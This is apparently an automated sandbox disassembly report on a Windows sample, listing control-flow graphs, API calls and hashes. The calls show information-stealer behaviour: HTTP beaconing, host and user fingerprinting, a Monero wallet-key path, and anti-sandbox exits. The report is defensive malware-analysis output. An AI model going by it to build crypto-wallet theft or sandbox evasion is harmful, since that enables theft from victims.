                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: HttpQueryInfoA$InternetSetOptionA
                  • API String ID: 2238633743-1775429166
                  • Opcode ID: 28aa634db3a45087b6dac17e01ba8a214047dafbe709513bbfa272e9b6833160
                  • Instruction ID: 051c6b9c27a69a5b160e6faa3404d68b5db3a5412d8aa16114d765faf613aa3b
                  • Opcode Fuzzy Hash: 28aa634db3a45087b6dac17e01ba8a214047dafbe709513bbfa272e9b6833160
                  • Instruction Fuzzy Hash: 416261B5500200AFC768DFA8EE8895637F9FF6E701708452AE605C3225D739A44BFF56

                  Control-flow Graph

                  control_flow_graph 1033 2e6280-2e630b call 2fa7a0 call 2e47b0 call 2fa740 InternetOpenA StrCmpCA 1040 2e630d 1033->1040 1041 2e6314-2e6318 1033->1041 1040->1041 1042 2e631e-2e6342 InternetConnectA 1041->1042 1043 2e6509-2e6525 call 2fa7a0 call 2fa800 * 2 1041->1043 1044 2e64ff-2e6503 InternetCloseHandle 1042->1044 1045 2e6348-2e634c 1042->1045 1061 2e6528-2e652d 1043->1061 1044->1043 1048 2e634e-2e6358 1045->1048 1049 2e635a 1045->1049 1051 2e6364-2e6392 HttpOpenRequestA 1048->1051 1049->1051 1053 2e6398-2e639c 1051->1053 1054 2e64f5-2e64f9 InternetCloseHandle 1051->1054 1056 2e639e-2e63bf InternetSetOptionA 1053->1056 1057 2e63c5-2e6405 HttpSendRequestA HttpQueryInfoA 1053->1057 1054->1044 1056->1057 1059 2e642c-2e644b call 2f8940 1057->1059 1060 2e6407-2e6427 call 2fa740 call 2fa800 * 2 1057->1060 1067 2e644d-2e6454 1059->1067 1068 2e64c9-2e64e9 call 2fa740 call 2fa800 * 2 1059->1068 1060->1061 1071 2e6456-2e6480 InternetReadFile 1067->1071 1072 2e64c7-2e64ef InternetCloseHandle 1067->1072 1068->1061 1076 2e648b 1071->1076 1077 2e6482-2e6489 1071->1077 1072->1054 1076->1072 1077->1076 1080 2e648d-2e64c5 call 2fa9b0 call 2fa8a0 call 2fa800 1077->1080 1080->1071
                  APIs
                    • Part of subcall function 002FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002FA7E6
                    • Part of subcall function 002E47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 002E4839
                    • Part of subcall function 002E47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 002E4849
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                  • InternetOpenA.WININET(00300DFE,00000001,00000000,00000000,00000000), ref: 002E62E1
                  • StrCmpCA.SHLWAPI(?,0132F360), ref: 002E6303
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 002E6335
                  • HttpOpenRequestA.WININET(00000000,GET,?,0132EB40,00000000,00000000,00400100,00000000), ref: 002E6385
                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 002E63BF
                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002E63D1
                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 002E63FD
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 002E646D
                  • InternetCloseHandle.WININET(00000000), ref: 002E64EF
                  • InternetCloseHandle.WININET(00000000), ref: 002E64F9
                  • InternetCloseHandle.WININET(00000000), ref: 002E6503
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                  • String ID: ERROR$ERROR$GET
                  • API String ID: 3749127164-2509457195
                  • Opcode ID: 564e20367718d11809847eb1df2d0181690548cccfbf5709dda1e486d9143214
                  • Instruction ID: b02dcdffbd2ae5f3ce5a32747d5cacd1e51830da52cce8343df5f51004545b26
                  • Opcode Fuzzy Hash: 564e20367718d11809847eb1df2d0181690548cccfbf5709dda1e486d9143214
                  • Instruction Fuzzy Hash: 37716E71A50248ABDB24DF90CC49BEEB774BF14740F5081A8F20A6B1D0DBB46A89CF51

                  Control-flow Graph

                  control_flow_graph 1090 2f5510-2f5577 call 2f5ad0 call 2fa820 * 3 call 2fa740 * 4 1106 2f557c-2f5583 1090->1106 1107 2f55d7-2f564c call 2fa740 * 2 call 2e1590 call 2f52c0 call 2fa8a0 call 2fa800 call 2faad0 StrCmpCA 1106->1107 1108 2f5585-2f55b6 call 2fa820 call 2fa7a0 call 2e1590 call 2f51f0 1106->1108 1134 2f5693-2f56a9 call 2faad0 StrCmpCA 1107->1134 1138 2f564e-2f568e call 2fa7a0 call 2e1590 call 2f51f0 call 2fa8a0 call 2fa800 1107->1138 1124 2f55bb-2f55d2 call 2fa8a0 call 2fa800 1108->1124 1124->1134 1139 2f56af-2f56b6 1134->1139 1140 2f57dc-2f5844 call 2fa8a0 call 2fa820 * 2 call 2e1670 call 2fa800 * 4 call 2f6560 call 2e1550 1134->1140 1138->1134 1143 2f56bc-2f56c3 1139->1143 1144 2f57da-2f585f call 2faad0 StrCmpCA 1139->1144 1270 2f5ac3-2f5ac6 1140->1270 1148 2f571e-2f5793 call 2fa740 * 2 call 2e1590 call 2f52c0 call 2fa8a0 call 2fa800 call 2faad0 StrCmpCA 1143->1148 1149 2f56c5-2f5719 call 2fa820 call 2fa7a0 call 2e1590 call 2f51f0 call 2fa8a0 call 2fa800 1143->1149 1163 2f5865-2f586c 1144->1163 1164 2f5991-2f59f9 call 2fa8a0 call 2fa820 * 2 call 2e1670 call 2fa800 * 4 call 2f6560 call 2e1550 1144->1164 1148->1144 1249 2f5795-2f57d5 call 2fa7a0 call 2e1590 call 2f51f0 call 2fa8a0 call 2fa800 1148->1249 1149->1144 1170 2f598f-2f5a14 call 2faad0 StrCmpCA 1163->1170 1171 2f5872-2f5879 1163->1171 1164->1270 1200 2f5a28-2f5a91 call 2fa8a0 call 2fa820 * 2 call 2e1670 call 2fa800 * 4 call 2f6560 call 2e1550 1170->1200 1201 2f5a16-2f5a21 Sleep 1170->1201 1179 2f587b-2f58ce call 2fa820 call 2fa7a0 call 2e1590 call 2f51f0 call 2fa8a0 call 2fa800 1171->1179 1180 2f58d3-2f5948 call 2fa740 * 2 call 2e1590 call 2f52c0 call 2fa8a0 call 2fa800 call 2faad0 StrCmpCA 1171->1180 1179->1170 1180->1170 1275 2f594a-2f598a call 2fa7a0 call 2e1590 call 2f51f0 call 2fa8a0 call 2fa800 1180->1275 1200->1270 1201->1106 1249->1144 1275->1170
                  APIs
                    • Part of subcall function 002FA820: lstrlen.KERNEL32(002E4F05,?,?,002E4F05,00300DDE), ref: 002FA82B
                    • Part of subcall function 002FA820: lstrcpy.KERNEL32(00300DDE,00000000), ref: 002FA885
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 002F5644
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 002F56A1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 002F5857
                    • Part of subcall function 002FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002FA7E6
                    • Part of subcall function 002F51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 002F5228
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                    • Part of subcall function 002F52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 002F5318
                    • Part of subcall function 002F52C0: lstrlen.KERNEL32(00000000), ref: 002F532F
                    • Part of subcall function 002F52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 002F5364
                    • Part of subcall function 002F52C0: lstrlen.KERNEL32(00000000), ref: 002F5383
                    • Part of subcall function 002F52C0: lstrlen.KERNEL32(00000000), ref: 002F53AE
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 002F578B
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 002F5940
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 002F5A0C
                  • Sleep.KERNEL32(0000EA60), ref: 002F5A1B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen$Sleep
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 507064821-2791005934
                  • Opcode ID: 1e6aa38756018142567ba505f1a2b9f2aba1e791e1ebb6801fdccadd200bebf0
                  • Instruction ID: e74dee8c3965b43f4f5efd56f671ce58bc7b9852e27154ad8f861851e835e7f0
                  • Opcode Fuzzy Hash: 1e6aa38756018142567ba505f1a2b9f2aba1e791e1ebb6801fdccadd200bebf0
                  • Instruction Fuzzy Hash: CCE1EEB192010C9BCB14FBA0DD56EFDB378AF54380F508538A60B56195EF746A2ECF92

                  Control-flow Graph

                  Control-flow graph (rendered image not reproduced): function at 2f17a0, basic blocks 2f17a0-2f19cd; blocks call StrCmpCA and ExitProcess.
                  APIs
                  • StrCmpCA.SHLWAPI(00000000,block), ref: 002F17C5
                  • ExitProcess.KERNEL32 ref: 002F17D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess
                  • String ID: block
                  • API String ID: 621844428-2199623458
                  • Opcode ID: 812d26e5b889bbf735363d138290d1c4f7517d4171e97c856d13d666de6cd93e
                  • Instruction ID: 79231bce5f49ebeffd9a0ceaadfd2ddde8a5da8f4aa6bae4b8a7deac416127bc
                  • Opcode Fuzzy Hash: 812d26e5b889bbf735363d138290d1c4f7517d4171e97c856d13d666de6cd93e
                  • Instruction Fuzzy Hash: 775150B4A2020EEBCB04DFA0D9A4BBEB7B5BF44784F504068E60667240D7B0D975DB62

                  Control-flow Graph

                  Control-flow graph (rendered image not reproduced): function at 2f7500, basic blocks 2f7500-2f768e; blocks call GetWindowsDirectoryA, GetVolumeInformationA, GetProcessHeap, RtlAllocateHeap and wsprintfA.
                  APIs
                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 002F7542
                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002F757F
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002F7603
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002F760A
                  • wsprintfA.USER32 ref: 002F7640
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                  • String ID: :$C$\$0
                  • API String ID: 1544550907-3036396339
                  • Opcode ID: 6626fe3b94347e82a9a8a8f2e9e7514bac8de4604aa9609d0a5a81e48c9661f3
                  • Instruction ID: 8d2cd7a0b1c92d2cdf9cf40c0cb9b6a0ef0a34db3465ec555c304676f593d835
                  • Opcode Fuzzy Hash: 6626fe3b94347e82a9a8a8f2e9e7514bac8de4604aa9609d0a5a81e48c9661f3
                  • Instruction Fuzzy Hash: 40417FB1D1424CABDB10DFA4DC45BEEFBB8AF18744F1000A8F609A7280DB746A54CFA5

                  Control-flow Graph

                  APIs
                    • Part of subcall function 002F9860: GetProcAddress.KERNEL32(75900000,01320798), ref: 002F98A1
                    • Part of subcall function 002F9860: GetProcAddress.KERNEL32(75900000,013207B0), ref: 002F98BA
                    • Part of subcall function 002F9860: GetProcAddress.KERNEL32(75900000,01320660), ref: 002F98D2
                    • Part of subcall function 002F9860: GetProcAddress.KERNEL32(75900000,013206C0), ref: 002F98EA
                    • Part of subcall function 002F9860: GetProcAddress.KERNEL32(75900000,01320810), ref: 002F9903
                    • Part of subcall function 002F9860: GetProcAddress.KERNEL32(75900000,013289A0), ref: 002F991B
                    • Part of subcall function 002F9860: GetProcAddress.KERNEL32(75900000,013166E0), ref: 002F9933
                    • Part of subcall function 002F9860: GetProcAddress.KERNEL32(75900000,013166A0), ref: 002F994C
                    • Part of subcall function 002F9860: GetProcAddress.KERNEL32(75900000,01320828), ref: 002F9964
                    • Part of subcall function 002F9860: GetProcAddress.KERNEL32(75900000,013207C8), ref: 002F997C
                    • Part of subcall function 002F9860: GetProcAddress.KERNEL32(75900000,01320840), ref: 002F9995
                    • Part of subcall function 002F9860: GetProcAddress.KERNEL32(75900000,01320570), ref: 002F99AD
                    • Part of subcall function 002F9860: GetProcAddress.KERNEL32(75900000,01316A20), ref: 002F99C5
                    • Part of subcall function 002F9860: GetProcAddress.KERNEL32(75900000,013206D8), ref: 002F99DE
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                    • Part of subcall function 002E11D0: ExitProcess.KERNEL32 ref: 002E1211
                    • Part of subcall function 002E1160: GetSystemInfo.KERNEL32(?), ref: 002E116A
                    • Part of subcall function 002E1160: ExitProcess.KERNEL32 ref: 002E117E
                    • Part of subcall function 002E1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 002E112B
                    • Part of subcall function 002E1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 002E1132
                    • Part of subcall function 002E1110: ExitProcess.KERNEL32 ref: 002E1143
                    • Part of subcall function 002E1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 002E123E
                    • Part of subcall function 002E1220: __aulldiv.LIBCMT ref: 002E1258
                    • Part of subcall function 002E1220: __aulldiv.LIBCMT ref: 002E1266
                    • Part of subcall function 002E1220: ExitProcess.KERNEL32 ref: 002E1294
                    • Part of subcall function 002F6770: GetUserDefaultLangID.KERNEL32 ref: 002F6774
                    • Part of subcall function 002E1190: ExitProcess.KERNEL32 ref: 002E11C6
                    • Part of subcall function 002F7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,002E11B7), ref: 002F7880
                    • Part of subcall function 002F7850: RtlAllocateHeap.NTDLL(00000000), ref: 002F7887
                    • Part of subcall function 002F7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 002F789F
                    • Part of subcall function 002F78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 002F7910
                    • Part of subcall function 002F78E0: RtlAllocateHeap.NTDLL(00000000), ref: 002F7917
                    • Part of subcall function 002F78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 002F792F
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,013289B0,?,0030110C,?,00000000,?,00301110,?,00000000,00300AEF), ref: 002F6ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 002F6AE8
                  • CloseHandle.KERNEL32(00000000), ref: 002F6AF9
                  • Sleep.KERNEL32(00001770), ref: 002F6B04
                  • CloseHandle.KERNEL32(?,00000000,?,013289B0,?,0030110C,?,00000000,?,00301110,?,00000000,00300AEF), ref: 002F6B1A
                  • ExitProcess.KERNEL32 ref: 002F6B22
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                  • String ID:
                  • API String ID: 2525456742-0
                  • Opcode ID: 9b221454ed7beb70d35a8c3ffc6d797dadbc21c29165ddb51c8f061f01afa0b6
                  • Instruction ID: dd2cbb839de4b518433479173e066c73bbf496e3ee3b052c70f08cc41f56b40e
                  • Opcode Fuzzy Hash: 9b221454ed7beb70d35a8c3ffc6d797dadbc21c29165ddb51c8f061f01afa0b6
                  • Instruction Fuzzy Hash: 05310C7196010CAADB04FBA0DC56AFEB738AF147C0F404538F306A6181DFB06A25DEA6

                  Control-flow Graph

                  Control-flow graph (rendered image not reproduced): function at 2e1220, basic blocks 2e1220-2e129d; blocks call GlobalMemoryStatusEx and ExitProcess.
                  APIs
                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 002E123E
                  • __aulldiv.LIBCMT ref: 002E1258
                  • __aulldiv.LIBCMT ref: 002E1266
                  • ExitProcess.KERNEL32 ref: 002E1294
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                  • String ID: @
                  • API String ID: 3404098578-2766056989
                  • Opcode ID: ef2b5c4eabe0de151ae04922570642e9b23ef3d820a16824ac04aca48632da0b
                  • Instruction ID: 95cceaba4d4442f7cede520665fb63762017ea253dbe3adf6049c19f040b7303
                  • Opcode Fuzzy Hash: ef2b5c4eabe0de151ae04922570642e9b23ef3d820a16824ac04aca48632da0b
                  • Instruction Fuzzy Hash: DF014FB0990348ABDB10DBD1CC49BADB778AF14701F608064EB05B6284D6B455659B59

                  Control-flow Graph

                  Control-flow graph (rendered image not reproduced): basic blocks 2f6aba-2f6b22; blocks call OpenEventA, CreateEventA, CloseHandle, Sleep and ExitProcess.
                  APIs
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,013289B0,?,0030110C,?,00000000,?,00301110,?,00000000,00300AEF), ref: 002F6ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 002F6AE8
                  • CloseHandle.KERNEL32(00000000), ref: 002F6AF9
                  • Sleep.KERNEL32(00001770), ref: 002F6B04
                  • CloseHandle.KERNEL32(?,00000000,?,013289B0,?,0030110C,?,00000000,?,00301110,?,00000000,00300AEF), ref: 002F6B1A
                  • ExitProcess.KERNEL32 ref: 002F6B22
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                  • String ID:
                  • API String ID: 941982115-0
                  • Opcode ID: 31c43f8e7e10b9a376da92e97f81bc3cd1110422b9f6c494fea391e3b07c0e11
                  • Instruction ID: f29165efcdf32917c451b30ecab8a5b6b785bbe3788445d96f872ad70b5ff1cf
                  • Opcode Fuzzy Hash: 31c43f8e7e10b9a376da92e97f81bc3cd1110422b9f6c494fea391e3b07c0e11
                  • Instruction Fuzzy Hash: 24F03A7096021EABE710ABA0DC0EBBDBA34FF14B85F104524F703A1181DBF05565EA56

                  Control-flow Graph

                  APIs
                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 002E4839
                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 002E4849
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CrackInternetlstrlen
                  • String ID: <
                  • API String ID: 1274457161-4251816714
                  • Opcode ID: 15c04d35d8c99139f1e9f567892b43e382c8876d54038f7223b22ee61cbf9a93
                  • Instruction ID: e37ec1b40e4ab6ab474ddd96c232415c70bea586df34bc9980f0843b0656c6a0
                  • Opcode Fuzzy Hash: 15c04d35d8c99139f1e9f567892b43e382c8876d54038f7223b22ee61cbf9a93
                  • Instruction Fuzzy Hash: 79215EB1D00208ABDF10DFA5EC45ADEBB74FF45320F108625FA15A7290EB706A0ACF81

                  Control-flow Graph

                  APIs
                    • Part of subcall function 002FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002FA7E6
                    • Part of subcall function 002E6280: InternetOpenA.WININET(00300DFE,00000001,00000000,00000000,00000000), ref: 002E62E1
                    • Part of subcall function 002E6280: StrCmpCA.SHLWAPI(?,0132F360), ref: 002E6303
                    • Part of subcall function 002E6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 002E6335
                    • Part of subcall function 002E6280: HttpOpenRequestA.WININET(00000000,GET,?,0132EB40,00000000,00000000,00400100,00000000), ref: 002E6385
                    • Part of subcall function 002E6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 002E63BF
                    • Part of subcall function 002E6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002E63D1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 002F5228
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                  • String ID: ERROR$ERROR
                  • API String ID: 3287882509-2579291623
                  • Opcode ID: 3bb36c8b9ca4939ddf4e6292b27a7c5ec0309e233041d500525eecc7b5474646
                  • Instruction ID: b16a4da51309ebd2efeb22b750cf52c97cbe838579c790fba82e45a7e4398fde
                  • Opcode Fuzzy Hash: 3bb36c8b9ca4939ddf4e6292b27a7c5ec0309e233041d500525eecc7b5474646
                  • Instruction Fuzzy Hash: 6C11D07092014CA7DB14FF64DD529FDB378AF50380F808274FA1A56592EF706B25CE51
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002F7910
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002F7917
                  • GetComputerNameA.KERNEL32(?,00000104), ref: 002F792F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateComputerNameProcess
                  • String ID:
                  • API String ID: 1664310425-0
                  • Opcode ID: c879f3ea6836ccb71e6dbc283007c906c473cf335312c7464acdf630838fbadf
                  • Instruction ID: 802eaad19d275122f0de81aeab20040e350abb8a5b314a7e7f89ba97bcfec2c3
                  • Opcode Fuzzy Hash: c879f3ea6836ccb71e6dbc283007c906c473cf335312c7464acdf630838fbadf
